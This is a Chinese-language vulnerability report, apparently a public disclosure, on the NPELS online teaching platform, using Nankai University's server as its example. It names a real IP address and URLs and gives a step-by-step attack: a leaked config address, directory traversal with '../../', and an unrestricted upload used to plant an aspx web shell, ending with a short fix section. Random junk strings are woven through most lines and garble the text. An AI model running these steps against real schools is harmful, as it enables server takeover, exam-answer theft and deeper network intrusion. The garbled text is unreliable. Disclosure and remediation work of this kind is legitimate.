好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中8 V) o$ Y2 q1 m) r0 W
# x& F0 a# M! J9 s详细说明:
* u% k+ a m* |- N* ^' E9 w 8 k4 ^1 P" Y4 d" L* D, ^: C6 C
以南开大学的为例: 1 |, Z- R6 [( X
http://222.30.60.3/NPELS
: S% X# y+ t* Y& eNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
: B& N! `, C3 Z8 K) i) e6 a<setting name="Update_CommonSvr_CommonService" serializeAs="String">
) k( V4 ~% a" I( l1 j1 G1 d<value>http://222.30.60.3/NPELS/CommonService.asmx</value>/ n% k% v8 a/ _1 [- n0 F5 q
</setting>
: Q5 {9 I2 O \: f& f及版本号
' R: F: z5 _1 f9 C+ q( x" F<add key="TVersion" value="1, 0, 0, 2187">2 [9 i. @" m, g$ r+ g
</add>: L8 O @$ A* M/ {! l
直接访问
" E# y+ F* S$ A6 r0 b( Whttp://222.30.60.3/NPELS/CommonService.asmx; K' `% T% W( `; `9 m
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
1 U( D$ S4 H4 E1 t0 t: |http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
0 L4 n M6 B6 }进一步列目录(返回的网页很大,可以直接 wget 下来)
: h8 E) d- c: g s5 mhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
5 p, d u x8 n# o$ t4 v. V . b! x0 t r% Z6 Z! v# u+ e
发现! O3 j1 N- b }. H& w4 t1 t9 c# x% f
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
X3 t3 A4 z2 M, Z可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头! L. C8 M; |# k$ v6 Q
上传后继续列目录找到木马地址直接访问即可2 e6 i0 u( ]! T1 j, R! w" r" }. C
' y6 {8 i9 `6 ] ?" \OOXX
* m% D* u$ B4 x; r: G6 g8 q' M0 O
; j# B1 Q- K! `; Z; Y" {$ zGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
- Z p" W, J' P. y$ B漏洞证明:
! `; f, L3 f ~; A D1 `
- A- e$ |" ?" Z列目录:. u4 v, L. q6 @, Z% H
http://222.30.60.3/NPELS/CommonS ... List?version=../../; [3 @3 g9 ~" V, e/ y' F3 _, l( {/ z% [
文件上传:9 E% d1 z$ y" h" s5 l0 p! k
http://222.30.60.3/npelsv/editor/editor.htm* O$ }& i7 n( t @0 b6 Y: g
7 C) M! K- T: U, r4 ]# u! g, ]上传木马:
, @6 g+ A) [# v! a( L8 e# Xhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
, b+ h7 d J, }' c* W, c ) V# ~3 b6 d1 X8 [% f
修复方案:) b7 R$ [2 d& c3 P) n
好像考试系统必须使用 CommonService.asmx% o& w, a, s3 O5 w
最好配置文件加密或者用别的方式不让它泄露出来 B& S' R% k2 b2 B
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
% K1 e! o4 s/ Y, h |